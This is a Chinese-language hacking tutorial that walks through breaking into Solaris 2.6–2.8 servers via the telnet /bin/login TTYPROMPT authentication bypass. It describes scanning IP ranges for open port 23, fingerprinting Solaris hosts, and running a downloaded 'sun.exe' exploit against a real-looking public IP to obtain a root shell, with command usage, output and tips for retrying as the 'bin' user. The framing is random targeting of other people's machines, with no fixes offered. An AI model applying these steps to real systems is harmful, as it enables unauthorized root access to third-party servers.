惊心动魄 记一次成功入侵Solaris服务器(sun)

入侵准备 
  
    最近微软的漏洞可就多了,所以在网上流传着各种各样的入侵Windows的文章,早就听说了Solaris系统也出来漏洞,决定拿这个要练习一下,随便熟悉一个这个系统. 在Solaris系统2.6 2.7和2.8的/bin/login存在一个可以通过环境变量TTYPROMPT绕过验证的漏洞,这个漏洞其实早在2002年10月就发布了,在时间上还算是很新,在网上也应该能找到没有打补丁的机子,但是如果已经安装了 “System V系统Login远程缓冲区溢出漏洞”补丁的系统不受这个漏洞的影响,所以对于这个系统成功率也不是很高. 
  
所需工具 
  
    1, SCANNER.EXE,这个大家是很熟悉的了,我们这里是用它来寻找网络上开了23端口telnet服务的主机. 
  
    2, 天眼1.0.5.exe,这个是被动式系统识别,域名解析,地理位置查询,可以用来探测系统的类型. 
  
    3, WinPcap_2_3.exe, 由于天眼1.0.5构建在LibPcap之上,故在运行本软件之前必须安装Winpcap驱动. 
  
    (上述三个工具可以去安全焦点http://www.xfouse.net 下载) 
  
    4,sun.exe,红客联盟的Lion写的Win版本的工具程序,可以去http://www.cnhonker.com 下载,解压后发现有两个文件,sun.exe和CYGWIN1.DLL,在使用的时候请把两者放在同一目录下sun.exe才可使用. 
  
工具实例 
  
    我们首先要做的就是寻找开了23端口的Solaris主机.虽然这样的机子在网上也有不少,可是毕竟不想Windows一样到处都是. 
  
    安装WinPcap_2_3.exe驱动,以便让天眼能够工作,安装完毕就可以打开天眼了,在菜单栏上点击 “操作”,选择 “开始”就可以让它工作了.
  
    然后我们打开SCANNER.EXE,填入我们要扫描的IP地址,在 “扫描选项”的 “端口范围”写上23到23,这样就可以扫描IP段内所有开放23端口的主机了.


    等扫描结束以后,我们再看看以前打开的天眼,怎么样?找到了很多的Solaris主机了吧!(如果没有发现Solaris主机,那么在SCANNER.EXE另外换一个IP段试一试,应该能找到一些的). 
  
    好了,主机已经找到了,接下来就是利用这个漏洞入侵了 ,将下载的sunos-telnet.zip解压后发现有两个文件,sun.exe和CYGWIN1.DLL,由于sun.exe需要CYGWIN1.DLL动态数据库的支持,所以在使用的时候请把两者放在同一目录下. 
  
    还是让我们来看看sun.exe的用法,开一个CMD,进入改文件的目录,在CMD下输入:
  
  F:HACK>sun.exe
  
  ======================
  
  Solaris 5.6 7 8 telnetd Remote exploit
  
  Code by lion, Welcome to HUC website http://www.cnhonker.com
  
  usage: sun [-u user] [-p port] <-h host>
  
  -u: login username (default: bin), try “root”
  
  -p: port to use (default: 23)
  
  看懂了吧!假设我们找到一个IP为202.193.*.80的Solaris主机,那么我们就输入”
  
  sun.exe ?Cu root ?Cp 23 ?Ch 202.193.*.80
  
  我们也可以直接的输入:
  
  sun.exe ?Ch 202.193.*.80
  
  这时就使用默认的值,用户名为bin,端口为23.
  
  现在我们就拿一台我们刚刚找到的Solaris主机来做测试了,由于攻击的端口就是23,所以这个-p我们就不要输入了,在CMD下输入:
  
  Microsoft Windows XP [版本 5.1.2600]
  
  (C) 版权所有 1985-2001 Microsoft Corp. D:Documents and Settingslinyun>f:
  
  F:>cd hack
  
  F:HACK>sun.exe -u root -h 210.220.131.236
  
  ==========================
  
  Solaris 5.6 7 8 telnetd Remote exploite
  
  Code by lion.Welcome to HUC website http://www.cnhonker.com
  
  send to target:
  
  root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
  
  c c c c c c c c c c c c c c c c c c c c c c c c c c 
  
    当出现了#这个符号的时候,这就说明了我们已经取得了管理员的权限了。 
  
    我们可以看看自己是不是真的取得管理员的权限了,在CMD中输入who am i就可以看见我们的IP地址了! 
  
    注意:如果在攻击的时候出现connect: Connection refused;connect: Connection aborted; connect: Connection reset by peer这样的信息,或者等了很久还没有反应,则表示攻击失败了,最大的可能是这台Slaris不允许root用户远程登陆,我们可以用一般的系统用户bin溢出试一试.